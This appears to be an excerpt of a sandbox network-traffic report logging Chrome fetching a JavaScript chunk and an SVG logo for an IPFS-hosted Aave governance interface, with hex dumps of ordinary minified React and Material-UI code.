                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 20 74 72 61 63 6b 20 79 6f 75 72 20 62 61 6c 61 6e 63 65 2e 22 2c 76 61 6c 75 65 73 3a 7b 30 3a 62 26 26 62 2e 61 54 6f 6b 65 6e 3f 22 61 54 6f 6b 65 6e 20 22 3a 22 74 6f 6b 65 6e 20 22 7d 7d 29 7d 29 2c 28 30 2c 78 2e 6a 73 78 73 29 28 63 2e 5a 2c 7b 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 6b 28 7b 61 64 64 72 65 73 73 3a 62 2e 61 64 64 72 65 73 73 2c 64 65 63 69 6d 61 6c 73 3a 62 2e 64 65 63 69 6d 61 6c 73 2c 73 79 6d 62 6f 6c 3a 62 2e 61 54 6f 6b 65 6e 3f 22 22 3a 62 2e 73 79 6d 62 6f 6c 2c 69 6d 61 67 65 3a 2f 5f 2f 2e 74 65 73 74 28 62 2e 73 79 6d 62 6f 6c 29 3f 76 6f 69 64 20 30 3a 54 7d 29 7d 2c 76 61 72 69 61 6e 74 3a 22 64 61 72 6b 22 3d 3d 3d 4f 2e 70 61 6c 65 74 74 65 2e 6d 6f 64 65 3f 22 6f 75 74 6c 69 6e 65 64 22 3a 22 63 6f
                                                                                                                                                                                                                                                  Data Ascii: track your balance.",values:{0:b&&b.aToken?"aToken ":"token "}})}),(0,x.jsxs)(c.Z,{onClick:function(){k({address:b.address,decimals:b.decimals,symbol:b.aToken?"":b.symbol,image:/_/.test(b.symbol)?void 0:T})},variant:"dark"===O.palette.mode?"outlined":"co
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 2c 66 6c 65 78 57 72 61 70 3a 22 77 72 61 70 22 7d 2c 65 2e 72 6f 77 26 26 7b 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 72 6f 77 22 7d 29 29 29 3b 76 61 72 20 46 3d 72 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 28 30 2c 56 2e 5a 29 28 7b 70 72 6f 70 73 3a 65 2c 6e 61 6d 65 3a 22 4d 75 69 46 6f 72 6d 47 72 6f 75 70 22 7d 29 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 72 2c 72 6f 77 3a 61 3d 21 31 7d 3d 6e 2c 6f 3d 28 30 2c 50 2e 5a 29 28 6e 2c 47 29 2c 73 3d 28 30 2c 4d 2e 5a 29 28 29 2c 69 3d 28 30 2c 7a 2e 5a 29 28 7b 70 72 6f 70 73 3a 6e 2c 6d 75 69 46 6f 72 6d 43 6f 6e 74 72 6f 6c 3a 73 2c 73 74 61 74 65 73 3a 5b 22 65 72
                                                                                                                                                                                                                                                  Data Ascii: x",flexDirection:"column",flexWrap:"wrap"},e.row&&{flexDirection:"row"})));var F=r.forwardRef((function(e,t){const n=(0,V.Z)({props:e,name:"MuiFormGroup"}),{className:r,row:a=!1}=n,o=(0,P.Z)(n,G),s=(0,M.Z)(),i=(0,z.Z)({props:n,muiFormControl:s,states:["er
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 63 2d 34 2e 34 32 20 30 2d 38 2d 33 2e 35 38 2d 38 2d 38 73 33 2e 35 38 2d 38 20 38 2d 38 20 38 20 33 2e 35 38 20 38 20 38 2d 33 2e 35 38 20 38 2d 38 20 38 7a 22 7d 29 2c 22 52 61 64 69 6f 42 75 74 74 6f 6e 55 6e 63 68 65 63 6b 65 64 22 29 2c 6e 65 3d 28 30 2c 65 65 2e 5a 29 28 28 30 2c 5f 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 38 2e 34 36 35 20 38 2e 34 36 35 43 39 2e 33 37 20 37 2e 35 36 20 31 30 2e 36 32 20 37 20 31 32 20 37 43 31 34 2e 37 36 20 37 20 31 37 20 39 2e 32 34 20 31 37 20 31 32 43 31 37 20 31 33 2e 33 38 20 31 36 2e 34 34 20 31 34 2e 36 33 20 31 35 2e 35 33 35 20 31 35 2e 35 33 35 43 31 34 2e 36 33 20 31 36 2e 34 34 20 31 33 2e 33 38 20 31 37 20 31 32 20 31 37 43 39 2e 32 34 20 31 37 20 37 20 31 34 2e 37 36 20 37 20 31 32 43
                                                                                                                                                                                                                                                  Data Ascii: c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8z"}),"RadioButtonUnchecked"),ne=(0,ee.Z)((0,_.jsx)("path",{d:"M8.465 8.465C9.37 7.56 10.62 7 12 7C14.76 7 17 9.24 17 12C17 13.38 16.44 14.63 15.535 15.535C14.63 16.44 13.38 17 12 17C9.24 17 7 14.76 7 12C
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 7c 7c 22 63 6c 61 73 73 65 73 22 3d 3d 3d 65 2c 6e 61 6d 65 3a 22 4d 75 69 52 61 64 69 6f 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 74 29 3d 3e 7b 63 6f 6e 73 74 7b 6f 77 6e 65 72 53 74 61 74 65 3a 6e 7d 3d 65 3b 72 65 74 75 72 6e 5b 74 2e 72 6f 6f 74 2c 74 5b 60 63 6f 6c 6f 72 24 7b 28 30 2c 69 65 2e 5a 29 28 6e 2e 63 6f 6c 6f 72 29 7d 60 5d 5d 7d 7d 29 28 28 28 7b 74 68 65 6d 65 3a 65 2c 6f 77 6e 65 72 53 74 61 74 65 3a 74 7d 29 3d 3e 28 30 2c 44 2e 5a 29 28 7b 63 6f 6c 6f 72 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 2c 22 26 3a 68 6f 76 65 72 22 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 65 2e 76 61 72 73 3f 60 72 67
                                                                                                                                                                                                                                                  Data Ascii: ||"classes"===e,name:"MuiRadio",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:n}=e;return[t.root,t[`color${(0,ie.Z)(n.color)}`]]}})((({theme:e,ownerState:t})=>(0,D.Z)({color:(e.vars||e).palette.text.secondary,"&:hover":{backgroundColor:e.vars?`rg


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  108192.168.2.549833209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC749OUTGET /_next/static/chunks/503.5217c75933b76bbc.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1368INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:54 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 22367
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreigoqyhv6irkfs37fyxsddn3vo46xfk4wuy2fm62zh3kb4yd72av2y"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/503.5217c75933b76bbc.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreigoqyhv6irkfs37fyxsddn3vo46xfk4wuy2fm62zh3kb4yd72av2y
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-09
                                                                                                                                                                                                                                                  CF-Cache-Status: MISS
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 35 66 34 63 32 62 38 63 35 31 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Server: cloudflareCF-RAY: 8ca0e45f4c2b8c51-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1318INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 30 33 5d 2c 7b 32 31 33 38 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 76 61 72 20 6e 3d 74 28 36 34 38 33 36 29 3b 72 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 6e 28 74 28 36 34 39 33 38 29 29 2c 61 3d 74 28 38 35 38 39 33 29 2c 69 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 61 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 39 20 31 36 2e 31 37 20 35 2e 35 33 20 31 32 2e 37 61 2e 39 39 35 39 2e 39 39 35 39 20 30 20 30 20 30 2d 31 2e 34 31 20 30 63 2d 2e 33 39 2e 33 39 2d 2e 33 39 20 31 2e 30 32 20 30 20 31 2e 34
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[503],{21386:function(e,r,t){var n=t(64836);r.Z=void 0;var o=n(t(64938)),a=t(85893),i=(0,o.default)((0,a.jsx)("path",{d:"M9 16.17 5.53 12.7a.9959.9959 0 0 0-1.41 0c-.39.39-.39 1.02 0 1.4
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 2e 34 31 4c 31 30 20 31 34 2e 31 37 6c 37 2e 35 39 2d 37 2e 35 39 4c 31 39 20 38 6c 2d 39 20 39 7a 22 7d 29 2c 22 43 68 65 63 6b 42 6f 78 22 29 2c 68 3d 28 30 2c 64 2e 5a 29 28 28 30 2c 75 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 31 39 20 33 48 35 63 2d 31 2e 31 20 30 2d 32 20 2e 39 2d 32 20 32 76 31 34 63 30 20 31 2e 31 2e 39 20 32 20 32 20 32 68 31 34 63 31 2e 31 20 30 20 32 2d 2e 39 20 32 2d 32 56 35 63 30 2d 31 2e 31 2d 2e 39 2d 32 2d 32 2d 32 7a 6d 2d 32 20 31 30 48 37 76 2d 32 68 31 30 76 32 7a 22 7d 29 2c 22 49 6e 64 65 74 65 72 6d 69 6e 61 74 65 43 68 65 63 6b 42 6f 78 22 29 2c 78 3d 74 28 33 36 36 32 32 29 2c 66 3d 74 28 37 38 38 38 34 29 2c 6d 3d 74 28 38 31 37 31 39 29 2c 6a 3d 74 28 33 34 38 36 37 29 3b 66 75 6e 63 74 69 6f 6e 20
                                                                                                                                                                                                                                                  Data Ascii: .41L10 14.17l7.59-7.59L19 8l-9 9z"}),"CheckBox"),h=(0,d.Z)((0,u.jsx)("path",{d:"M19 3H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2zm-2 10H7v-2h10v2z"}),"IndeterminateCheckBox"),x=t(36622),f=t(78884),m=t(81719),j=t(34867);function
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 28 30 2c 75 2e 6a 73 78 29 28 76 2c 7b 7d 29 2c 50 3d 28 30 2c 75 2e 6a 73 78 29 28 70 2c 7b 7d 29 2c 6b 3d 28 30 2c 75 2e 6a 73 78 29 28 68 2c 7b 7d 29 3b 76 61 72 20 5a 3d 61 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 76 61 72 20 74 2c 73 3b 63 6f 6e 73 74 20 6c 3d 28 30 2c 66 2e 5a 29 28 7b 70 72 6f 70 73 3a 65 2c 6e 61 6d 65 3a 22 4d 75 69 43 68 65 63 6b 62 6f 78 22 7d 29 2c 7b 63 68 65 63 6b 65 64 49 63 6f 6e 3a 64 3d 77 2c 63 6f 6c 6f 72 3a 70 3d 22 70 72 69 6d 61 72 79 22 2c 69 63 6f 6e 3a 76 3d 50 2c 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 3a 68 3d 21 31 2c 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 49 63 6f 6e 3a 6d 3d 6b 2c 69 6e 70 75 74 50 72 6f 70 73 3a 6a 2c 73 69 7a 65 3a 67 3d 22 6d 65 64 69 75 6d 22 2c 63
                                                                                                                                                                                                                                                  Data Ascii: (0,u.jsx)(v,{}),P=(0,u.jsx)(p,{}),k=(0,u.jsx)(h,{});var Z=a.forwardRef((function(e,r){var t,s;const l=(0,f.Z)({props:e,name:"MuiCheckbox"}),{checkedIcon:d=w,color:p="primary",icon:v=P,indeterminate:h=!1,indeterminateIcon:m=k,inputProps:j,size:g="medium",c
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 54 68 65 72 65 20 77 61 73 20 73 6f 6d 65 20 65 72 72 6f 72 2e 20 50 6c 65 61 73 65 20 74 72 79 20 63 68 61 6e 67 69 6e 67 20 74 68 65 20 70 61 72 61 6d 65 74 65 72 73 20 6f 72 20 3c 30 3e 3c 31 3e 63 6f 70 79 20 74 68 65 20 65 72 72 6f 72 3c 2f 31 3e 3c 2f 30 3e 22 2c 63 6f 6d 70 6f 6e 65 6e 74 73 3a 7b 30 3a 28 30 2c 63 2e 6a 73 78 29 28 61 2e 5a 2c 7b 73 78 3a 7b 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3a 22 74 6f 70 22 7d 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 61 76 69 67 61 74 6f 72 2e 63 6c 69 70 62 6f 61 72 64 2e 77 72 69 74 65 54 65 78 74 28 72 2e 72 61 77 45 72 72 6f 72 2e 6d 65 73 73 61 67 65 2e 74 6f 53 74 72 69 6e 67 28 29 29 7d 7d 29 2c 31 3a 28 30 2c 63 2e 6a 73 78 29 28 6f 2e 5a 2c 7b 76 61 72 69
                                                                                                                                                                                                                                                  Data Ascii: There was some error. Please try changing the parameters or <0><1>copy the error</1></0>",components:{0:(0,c.jsx)(a.Z,{sx:{verticalAlign:"top"},onClick:function(){return navigator.clipboard.writeText(r.rawError.message.toString())}}),1:(0,c.jsx)(o.Z,{vari
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 69 73 57 72 6f 6e 67 4e 65 74 77 6f 72 6b 2c 6e 3d 65 2e 72 65 70 72 65 73 65 6e 74 61 74 69 76 65 73 2c 61 3d 28 30 2c 6f 2e 76 52 29 28 29 2c 69 3d 61 2e 6d 61 69 6e 54 78 53 74 61 74 65 2c 6c 3d 61 2e 73 65 74 4d 61 69 6e 54 78 53 74 61 74 65 2c 64 3d 61 2e 73 65 74 54 78 45 72 72 6f 72 2c 75 3d 61 2e 73 65 74 47 61 73 4c 69 6d 69 74 2c 70 3d 28 30 2c 4d 2e 7a 29 28 29 2e 67 6f 76 65 72 6e 61 6e 63 65 56 33 53 65 72 76 69 63 65 2c 76 3d 28 30 2c 62 2e 5a 29 28 29 2e 73 65 6e 64 54 78 2c 68 3d 28 30 2c 41 2e 4e 4c 29 28 29 2c 78 3d 28 30 2c 79 2e 59 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 5b 65 2e 61 63 63 6f 75 6e 74 2c 65 2e 65 73 74 69 6d 61 74 65 47 61 73 4c 69 6d 69 74 2c 65 2e 61 64 64 54 72 61 6e 73 61 63 74 69 6f 6e 5d 7d
                                                                                                                                                                                                                                                  Data Ascii: isWrongNetwork,n=e.representatives,a=(0,o.vR)(),i=a.mainTxState,l=a.setMainTxState,d=a.setTxError,u=a.setGasLimit,p=(0,M.z)().governanceV3Service,v=(0,b.Z)().sendTx,h=(0,A.NL)(),x=(0,y.Y)((function(e){return[e.account,e.estimateGasLimit,e.addTransaction]}
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 67 4e 65 74 77 6f 72 6b 3a 74 7d 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 56 28 65 2c 72 29 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 72 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 6e 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 65 29 7b 66 6f 72 28 76
                                                                                                                                                                                                                                                  Data Ascii: gNetwork:t})};function V(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);r&&(n=n.filter((function(r){return Object.getOwnPropertyDescriptor(e,r).enumerable}))),t.push.apply(t,n)}return t}function _(e){for(v
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 75 72 6e 20 6e 2e 73 75 63 63 65 73 73 3f 28 30 2c 42 2e 6a 73 78 29 28 50 2e 52 2c 7b 74 78 48 61 73 68 3a 6e 2e 74 78 48 61 73 68 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 42 2e 6a 73 78 29 28 42 2e 46 72 61 67 6d 65 6e 74 2c 7b 7d 29 7d 29 3a 28 30 2c 42 2e 6a 73 78 73 29 28 75 2e 5a 2c 7b 73 78 3a 7b 6d 3a 2d 33 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 42 2e 6a 73 78 29 28 75 2e 5a 2c 7b 73 78 3a 7b 70 3a 33 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 42 2e 6a 73 78 29 28 5a 2e 45 2c 7b 74 69 74 6c 65 3a 22 45 64 69 74 20 61 64 64 72 65 73 73 22 7d 29 7d 29 2c 57 26 26 21 54 26 26 28 30 2c 42 2e 6a 73 78 29 28 49 2e 49 2c 7b 6e 65 74 77 6f 72 6b 4e 61 6d 65 3a 46 2e 6e 61 6d 65 2c 63 68 61 69 6e 49 64 3a 56 7d 29 2c 28 30 2c 42 2e 6a 73 78 29 28 70 2e
                                                                                                                                                                                                                                                  Data Ascii: urn n.success?(0,B.jsx)(P.R,{txHash:n.txHash,children:(0,B.jsx)(B.Fragment,{})}):(0,B.jsxs)(u.Z,{sx:{m:-3},children:[(0,B.jsx)(u.Z,{sx:{p:3},children:(0,B.jsx)(Z.E,{title:"Edit address"})}),W&&!T&&(0,B.jsx)(I.I,{networkName:F.name,chainId:V}),(0,B.jsx)(p.
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 61 6c 75 65 3a 65 2e 72 65 70 72 65 73 65 6e 74 61 74 69 76 65 2c 65 72 72 6f 72 3a 65 2e 69 6e 76 61 6c 69 64 26 26 21 65 2e 72 65 6d 6f 76 65 2c 64 69 73 61 62 6c 65 64 3a 65 2e 72 65 6d 6f 76 65 2c 66 75 6c 6c 57 69 64 74 68 3a 21 30 2c 69 6e 70 75 74 50 72 6f 70 73 3a 7b 73 78 3a 7b 70 79 3a 32 2c 70 78 3a 33 2c 66 6f 6e 74 53 69 7a 65 3a 22 31 34 70 78 22 7d 7d 2c 65 6e 64 41 64 6f 72 6e 6d 65 6e 74 3a 22 22 3d 3d 3d 65 2e 72 65 70 72 65 73 65 6e 74 61 74 69 76 65 7c 7c 65 2e 69 6e 76 61 6c 69 64 3f 6e 75 6c 6c 3a 28 30 2c 42 2e 6a 73 78 29 28 64 2e 5a 2c 7b 66 6f 6e 74 53 69 7a 65 3a 22 73 6d 61 6c 6c 22 2c 63 6f 6c 6f 72 3a 22 73 75 63 63 65 73 73 22 7d 29 2c 6f 6e 43 68 61 6e 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 21 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                                  Data Ascii: alue:e.representative,error:e.invalid&&!e.remove,disabled:e.remove,fullWidth:!0,inputProps:{sx:{py:2,px:3,fontSize:"14px"}},endAdornment:""===e.representative||e.invalid?null:(0,B.jsx)(d.Z,{fontSize:"small",color:"success"}),onChange:function(e){!function
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 72 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 6e 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 67 28 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 31 3b 72 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3a 7b 7d 3b 72 25 32 3f 62 28 4f 62 6a 65 63 74 28 74 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e
                                                                                                                                                                                                                                                  Data Ascii: ropertySymbols(e);r&&(n=n.filter((function(r){return Object.getOwnPropertyDescriptor(e,r).enumerable}))),t.push.apply(t,n)}return t}function g(e){for(var r=1;r<arguments.length;r++){var t=null!=arguments[r]?arguments[r]:{};r%2?b(Object(t),!0).forEach((fun


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  109192.168.2.549834209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC774OUTGET /aave.svg HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1217INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:54 GMT
                                                                                                                                                                                                                                                  Content-Type: image/svg+xml
                                                                                                                                                                                                                                                  Content-Length: 1831
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreigoevbfk3e6wgsdoutgckgo6fjzmcd2lc4ah4qiha43436iprtzaa"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/aave.svg
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafkreigoevbfk3e6wgsdoutgckgo6fjzmcd2lc4ah4qiha43436iprtzaa
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-09
                                                                                                                                                                                                                                                  CF-Cache-Status: MISS
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e4634900c341-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
